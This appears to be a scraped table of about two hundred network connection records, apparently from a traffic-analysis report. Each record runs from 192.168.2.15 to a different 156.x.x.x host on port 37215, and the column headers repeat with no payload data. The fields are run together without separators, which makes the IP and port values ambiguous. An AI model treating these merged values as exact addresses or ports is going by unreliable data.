                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5096192.168.2.1545140156.50.27.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5097192.168.2.1560398156.47.27.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5098192.168.2.1536000156.172.220.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5099192.168.2.1555380156.201.222.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5100192.168.2.1554464156.110.149.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5101192.168.2.1548472156.85.238.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5102192.168.2.1554948156.212.59.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5103192.168.2.1558416156.18.161.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5104192.168.2.1542540156.14.159.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5105192.168.2.1551174156.7.138.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5106192.168.2.1533184156.57.117.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5107192.168.2.1539980156.2.185.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5108192.168.2.1538008156.9.226.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5109192.168.2.1559476156.208.158.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5110192.168.2.1559526156.167.84.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5111192.168.2.1554458156.235.180.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5112192.168.2.1542114156.157.247.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5113192.168.2.1540596156.166.117.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5114192.168.2.1549220156.61.128.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5115192.168.2.1559540156.199.116.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5116192.168.2.1559404156.5.230.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5117192.168.2.1560446156.206.32.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5118192.168.2.1536568156.172.49.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5119192.168.2.1538908156.248.38.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5120192.168.2.1535532156.154.86.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5121192.168.2.1533074156.229.56.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5122192.168.2.1539636156.113.200.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5123192.168.2.1558592156.166.225.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5124192.168.2.1556018156.222.198.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5125192.168.2.1558174156.0.225.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5126192.168.2.1541554156.108.243.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5127192.168.2.1559050156.107.239.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5128192.168.2.1542660156.75.103.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5129192.168.2.1554212156.173.71.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5130192.168.2.1548604156.205.8.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5131192.168.2.1545158156.68.133.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5132192.168.2.1539292156.86.9.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5133192.168.2.1535442156.231.216.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5134192.168.2.1547094156.14.52.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5135192.168.2.1553430156.209.185.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5136192.168.2.1537830156.165.118.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5137192.168.2.1545326156.218.92.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5138192.168.2.1557646156.57.45.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5139192.168.2.1548552156.94.200.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5140192.168.2.1548914156.63.55.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5141192.168.2.1546632156.199.195.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5142192.168.2.1533896156.24.84.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5143192.168.2.1538070156.22.94.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5144192.168.2.1557482156.93.141.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5145192.168.2.1554892156.2.37.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5146192.168.2.1536412156.201.184.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5147192.168.2.1545470156.204.221.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5148192.168.2.1550820156.140.54.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5149192.168.2.1558572156.96.28.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5150192.168.2.1557068156.133.26.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5151192.168.2.1539546156.82.143.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5152192.168.2.1551374156.108.241.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5153192.168.2.1533480156.12.191.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5154192.168.2.1535096156.180.19.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5155192.168.2.1545364156.186.249.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5156192.168.2.1543378156.47.203.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5157192.168.2.1552936156.133.20.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5158192.168.2.1544986156.124.255.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5159192.168.2.1533310156.14.175.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5160192.168.2.1546550156.191.168.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5161192.168.2.1560096156.47.64.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5162192.168.2.1556738156.11.243.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5163192.168.2.1555736156.63.3.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5164192.168.2.1542222156.135.5.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5165192.168.2.1547332156.130.12.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5166192.168.2.1535798156.186.203.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5167192.168.2.1542576156.39.161.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5168192.168.2.1546540156.249.230.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5169192.168.2.1545630156.127.208.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5170192.168.2.1552206156.64.16.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5171192.168.2.1559308156.132.177.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5172192.168.2.1552432156.109.152.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5173192.168.2.1538780156.2.94.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5174192.168.2.1535472156.127.100.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5175192.168.2.1550770156.188.28.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5176192.168.2.1542214156.112.55.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5177192.168.2.1538136156.107.67.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5178192.168.2.1559750156.165.201.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5179192.168.2.1545328156.155.79.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5180192.168.2.1545084156.39.205.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5181192.168.2.1542124156.113.23.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5182192.168.2.1545566156.189.59.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5183192.168.2.1549760156.237.249.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5184192.168.2.1558708156.212.171.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5185192.168.2.1533478156.37.121.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5186192.168.2.1553838156.50.8.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5187192.168.2.1551802156.67.68.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5188192.168.2.1542502156.13.81.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5189192.168.2.1544438156.137.219.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5190192.168.2.1559386156.126.1.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5191192.168.2.1548626156.96.162.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5192192.168.2.1556464156.108.109.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5193192.168.2.1543328156.246.99.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5194192.168.2.1543400156.128.107.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5195192.168.2.1542544156.60.134.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5196192.168.2.1532784156.77.95.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5197192.168.2.1559684156.114.162.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5198192.168.2.1539326156.131.228.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5199192.168.2.1538328156.55.44.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5200192.168.2.1553198156.107.220.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5201192.168.2.1558514156.79.173.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5202192.168.2.1548520156.41.52.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5203192.168.2.1546862156.158.43.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5204192.168.2.1540222156.237.6.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5205192.168.2.1554486156.242.22.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5206192.168.2.1541096156.205.105.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5207192.168.2.1555028156.12.221.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5208192.168.2.1544910156.18.39.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5209192.168.2.1536028156.13.24.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5210192.168.2.1553294156.17.236.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5211192.168.2.1538564156.218.184.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5212192.168.2.1545386156.214.165.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5213192.168.2.1553286156.219.246.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5214192.168.2.1547232156.72.241.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5215192.168.2.1538706156.126.7.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5216192.168.2.1539836156.74.245.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5217192.168.2.1553156156.249.37.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5218192.168.2.1545600156.129.211.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5219192.168.2.1553000156.78.71.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5220192.168.2.1547222156.205.84.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5221192.168.2.1537874156.36.145.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5222192.168.2.1549822156.156.145.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5223192.168.2.1548940156.32.72.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5224192.168.2.1551006156.45.117.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5225192.168.2.1551988156.246.211.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5226192.168.2.1546126156.30.216.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5227192.168.2.1542422156.78.185.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5228192.168.2.1552224156.230.51.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5229192.168.2.1534888156.166.143.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5230192.168.2.1541966156.1.254.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5231192.168.2.1554640156.115.159.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5232192.168.2.1560226156.14.108.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5233192.168.2.1560516156.96.187.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5234192.168.2.1545334156.151.74.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5235192.168.2.1538308156.102.116.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5236192.168.2.1547924156.244.24.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5237192.168.2.1537620156.163.84.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5238192.168.2.1559158156.160.104.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5239192.168.2.1550700156.213.135.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5240192.168.2.1551130156.30.246.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5241192.168.2.1553534156.98.85.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5242192.168.2.1537502156.179.55.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5243192.168.2.1552260156.71.208.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5244192.168.2.1548316156.108.101.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5245192.168.2.1551128156.149.190.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5246192.168.2.1555228156.133.227.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5247192.168.2.1535364156.200.116.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5248192.168.2.1538620156.186.234.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5249192.168.2.1536522156.88.20.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5250192.168.2.1560946156.188.60.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5251192.168.2.1539740156.223.239.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5252192.168.2.1548378156.162.105.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5253192.168.2.1535512156.130.137.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5254192.168.2.1558822156.128.16.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5255192.168.2.1541188156.125.161.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5256192.168.2.1553958156.121.79.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5257192.168.2.1539956156.167.125.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5258192.168.2.1556506156.119.85.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5259192.168.2.1535392156.243.28.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5260192.168.2.1550322156.253.181.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5261192.168.2.1535104156.54.45.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5262192.168.2.1554678156.106.54.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5263192.168.2.1560172156.246.186.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5264192.168.2.1549448156.49.131.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5265192.168.2.1544104156.74.96.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5266192.168.2.1552002156.79.211.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5267192.168.2.1544578156.57.233.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5268192.168.2.1545870156.35.233.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5269192.168.2.1558858156.84.152.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5270192.168.2.1558694156.53.176.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5271192.168.2.1537212156.90.31.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5272192.168.2.1538480156.85.147.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5273192.168.2.1559648156.171.152.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5274192.168.2.1536124156.41.95.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5275192.168.2.1555432156.52.195.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5276192.168.2.1556770156.1.82.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5277192.168.2.1534036156.133.243.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5278192.168.2.1552396156.68.38.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5279192.168.2.1554732156.109.100.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5280192.168.2.1534390156.12.189.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5281192.168.2.1552168156.206.138.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5282192.168.2.1533808156.154.119.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5283192.168.2.1540366156.168.193.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5284192.168.2.1551068156.116.105.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5285192.168.2.1547814156.176.127.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5286192.168.2.1538746156.160.36.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5287192.168.2.1543604156.121.195.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5288192.168.2.1556190156.145.130.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5289192.168.2.1555588156.50.218.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5290192.168.2.1552804156.107.188.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5291192.168.2.1533046156.31.101.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5292192.168.2.1539748156.222.42.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5293192.168.2.1541396156.80.189.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5294192.168.2.1545370156.148.15.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            5295192.168.2.1545282156.97.51.13137215
